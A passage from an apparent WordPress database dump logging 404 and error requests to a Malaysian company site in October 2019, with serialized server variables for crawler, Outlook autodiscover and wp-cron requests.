p-includes/js/tinymce/skins/lightgray/skin.min.css.map\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:56:\"/wp-includes/js/tinymce/skins/lightgray/skin.min.css.map\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZROb8WBowiMh4n@4AbzWAAAAAs\";s:19:\"REDIRECT_SCRIPT_URI\";s:78:\"https://bintara.com.my/wp-includes/js/tinymce/skins/lightgray/skin.min.css.map\";s:19:\"REDIRECT_SCRIPT_URL\";s:56:\"/wp-includes/js/tinymce/skins/lightgray/skin.min.css.map\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZROb8WBowiMh4n@4AbzWAAAAAs\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.144.235\";s:11:\"REMOTE_PORT\";s:5:\"53848\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:78:\"https://bintara.com.my/wp-includes/js/tinymce/skins/lightgray/skin.min.css.map\";s:10:\"SCRIPT_URL\";s:56:\"/wp-includes/js/tinymce/skins/lightgray/skin.min.css.map\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZROb8WBowiMh4n@4AbzWAAAAAs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570000496.5706\";s:12:\"REQUEST_TIME\";s:10:\"1570000496\";}}','notice','2019-10-02 07:14:59','2019-10-02 07:14:57',36017552,36273000,'https://bintara.com.my/wp-includes/js/tinymce/skins/lightgray/skin.min.css.map',1,1,'115.132.144.235'),(27428,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"315\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"8DEBE6D0-AFC3-43D8-B91F-BC6F6F710230\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZRPUjDIbReULXeMMDbYbAAAAEo\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.144.235\";s:11:\"REMOTE_PORT\";s:5:\"50805\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZRPUjDIbReULXeMMDbYbAAAAEo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570000723.0366\";s:12:\"REQUEST_TIME\";s:10:\"1570000723\";}}','notice','2019-10-02 07:18:46','2019-10-02 07:18:43',35510192,37310904,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.144.235'),(27429,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:22:\"/blog/tag/logitech-vc/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:12:\"gzip,deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:42:\"ru, uk;q=0.8, be;q=0.8, en;q=0.7, *;q=0.01\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"support@search.yandex.ru\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:193:\"Mozilla/5.0 (iPhone; CPU iPhone OS 8_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B411 Safari/600.1.4 (compatible; YandexMobileBot/3.0; +http://yandex.com/bots)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:44:\"https://bintara.com.my/blog/tag/logitech-vc/\";s:19:\"REDIRECT_SCRIPT_URL\";s:22:\"/blog/tag/logitech-vc/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZRnZcWBowiMh4n@4AYJRQAAAJM\";s:12:\"REDIRECT_URL\";s:22:\"/blog/tag/logitech-vc/\";s:11:\"REMOTE_ADDR\";s:13:\"141.8.142.158\";s:11:\"REMOTE_PORT\";s:5:\"52773\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:44:\"https://bintara.com.my/blog/tag/logitech-vc/\";s:10:\"SCRIPT_URL\";s:22:\"/blog/tag/logitech-vc/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZRnZcWBowiMh4n@4AYJRQAAAJM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570006886.0401\";s:12:\"REQUEST_TIME\";s:10:\"1570006886\";}}','notice','2019-10-02 09:01:29','2019-10-02 09:01:26',34066824,35871656,'https://bintara.com.my/blog/tag/logitech-vc/',1,0,'141.8.142.158'),(27430,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"/skype-for-business/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:66:\"Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"https://bintara.com.my/skype-for-business/\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/skype-for-business/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZRtOTDIbReULXeMMDbjlwAAAFU\";s:12:\"REDIRECT_URL\";s:20:\"/skype-for-business/\";s:11:\"REMOTE_ADDR\";s:13:\"54.36.150.190\";s:11:\"REMOTE_PORT\";s:5:\"19274\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"https://bintara.com.my/skype-for-business/\";s:10:\"SCRIPT_URL\";s:20:\"/skype-for-business/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZRtOTDIbReULXeMMDbjlwAAAFU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1570008377.924\";s:12:\"REQUEST_TIME\";s:10:\"1570008377\";}}','notice','2019-10-02 09:26:20','2019-10-02 09:26:18',35150776,36961464,'https://bintara.com.my/skype-for-business/',1,0,'54.36.150.190'),(27431,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:42:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:27:\"/apple-app-site-association\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,*/*;q=0.8,application/xml;q=0.9,application/xhtml+xml\";s:20:\"HTTP_ACCEPT_ENCODING\";s:15:\"gzip,deflate,br\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:50:\"AdsBot-Google (+http://www.google.com/adsbot.html)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:49:\"https://bintara.com.my/apple-app-site-association\";s:19:\"REDIRECT_SCRIPT_URL\";s:27:\"/apple-app-site-association\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZRvQ8WBowiMh4n@4AYPtAAAAIw\";s:12:\"REDIRECT_URL\";s:27:\"/apple-app-site-association\";s:11:\"REMOTE_ADDR\";s:13:\"66.249.91.242\";s:11:\"REMOTE_PORT\";s:5:\"63525\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:49:\"https://bintara.com.my/apple-app-site-association\";s:10:\"SCRIPT_URL\";s:27:\"/apple-app-site-association\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZRvQ8WBowiMh4n@4AYPtAAAAIw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570008901.0287\";s:12:\"REQUEST_TIME\";s:10:\"1570008901\";}}','notice','2019-10-02 09:35:06','2019-10-02 09:35:01',34045712,34392552,'https://bintara.com.my/apple-app-site-association',1,0,'66.249.91.242'),(27432,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:22:\"/blog/tag/logitech-vc/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:44:\"https://bintara.com.my/blog/tag/logitech-vc/\";s:19:\"REDIRECT_SCRIPT_URL\";s:22:\"/blog/tag/logitech-vc/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZR82GTGvQ0Bk@freozyPAAAAM4\";s:12:\"REDIRECT_URL\";s:22:\"/blog/tag/logitech-vc/\";s:11:\"REMOTE_ADDR\";s:11:\"13.66.139.0\";s:11:\"REMOTE_PORT\";s:5:\"34816\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:44:\"https://bintara.com.my/blog/tag/logitech-vc/\";s:10:\"SCRIPT_URL\";s:22:\"/blog/tag/logitech-vc/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZR82GTGvQ0Bk@freozyPAAAAM4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570012377.0788\";s:12:\"REQUEST_TIME\";s:10:\"1570012377\";}}','notice','2019-10-02 10:32:59','2019-10-02 10:32:57',35153856,36953936,'https://bintara.com.my/blog/tag/logitech-vc/',1,0,'13.66.139.0'),(27433,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:24:\"/?page_id=18/contact.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:22:\"page_id=18/contact.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"35.239.195.27\";s:11:\"REMOTE_PORT\";s:5:\"58381\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZSABpE1j0Gd0d0ESIzfIwAAAQc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570013190.4224\";s:12:\"REQUEST_TIME\";s:10:\"1570013190\";}}','notice','2019-10-02 10:46:32','2019-10-02 10:46:30',35142728,36949792,'https://bintara.com.my/?page_id=18/contact.php',1,0,'35.239.195.27'),(27434,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:84:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1570014403.2615458965301513671875\";s:14:\"CONTENT_LENGTH\";s:1:\"0\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1570014403.2615458965301513671875\";s:15:\"HTTP_USER_AGENT\";s:39:\"WordPress/5.1.2; https://bintara.com.my\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_CONTENT_LENGTH\";s:1:\"0\";s:30:\"REDIRECT_REDIRECT_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:39:\"REDIRECT_REDIRECT_CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:32:\"REDIRECT_REDIRECT_CONTEXT_PREFIX\";s:0:\"\";s:31:\"REDIRECT_REDIRECT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:29:\"REDIRECT_REDIRECT_ERROR_NOTES\";s:54:\"Script timed out before returning headers: wp-cron.php\";s:35:\"REDIRECT_REDIRECT_GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:29:\"REDIRECT_REDIRECT_HTTP_ACCEPT\";s:3:\"*/*\";s:38:\"REDIRECT_REDIRECT_HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:33:\"REDIRECT_REDIRECT_HTTP_CONNECTION\";s:5:\"close\";s:27:\"REDIRECT_REDIRECT_HTTP_HOST\";s:14:\"bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1570014403.2615458965301513671875\";s:33:\"REDIRECT_REDIRECT_HTTP_USER_AGENT\";s:39:\"WordPress/5.1.2; https://bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_X_HTTPS\";s:1:\"1\";s:22:\"REDIRECT_REDIRECT_PATH\";s:180:\"/usr/local/jdk/bin:/usr/kerberos/sbin:/usr/kerberos/bin:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/X11R6/bin:/usr/local/bin:/usr/X11R6/bin:/root/bin:/opt/bin\";s:30:\"REDIRECT_REDIRECT_QUERY_STRING\";s:47:\"doing_wp_cron=1570014403.2615458965301513671875\";s:29:\"REDIRECT_REDIRECT_REMOTE_ADDR\";s:12:\"103.6.198.69\";s:29:\"REDIRECT_REDIRECT_REMOTE_PORT\";s:5:\"41092\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:4:\"POST\";s:32:\"REDIRECT_REDIRECT_REQUEST_SCHEME\";s:5:\"https\";s:29:\"REDIRECT_REDIRECT_REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1570014403.2615458965301513671875\";s:33:\"REDIRECT_REDIRECT_SCRIPT_FILENAME\";s:52:\"/home/norfaiz/public_html/bintara.com.my/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SCRIPT_NAME\";s:12:\"/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SERVER_ADDR\";s:12:\"103.6.198.69\";s:30:\"REDIRECT_REDIRECT_SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:29:\"REDIRECT_REDIRECT_SERVER_NAME\";s:14:\"bintara.com.my\";s:29:\"REDIRECT_REDIRECT_SERVER_PORT\";s:3:\"443\";s:33:\"REDIRECT_REDIRECT_SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:34:\"REDIRECT_REDIRECT_SERVER_SIGNATURE\";s:0:\"\";s:33:\"REDIRECT_REDIRECT_SERVER_SOFTWARE\";s:6:\"Apache\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"500\";s:29:\"REDIRECT_REDIRECT_SUPHP_GROUP\";s:7:\"norfaiz\";s:31:\"REDIRECT_REDIRECT_SUPHP_HANDLER\";s:28:\"application/x-httpd-ea-php56\";s:28:\"REDIRECT_REDIRECT_SUPHP_USER\";s:7:\"norfaiz\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZSEw5E1j0Gd0d0ESIzhwAAAAQI\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"500\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZSEw5E1j0Gd0d0ESIzhwAAAAQI\";s:12:\"REDIRECT_URL\";s:10:\"/500.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"103.6.198.69\";s:11:\"REMOTE_PORT\";s:5:\"41092\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:10:\"SCRIPT_URL\";s:12:\"/wp-cron.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SER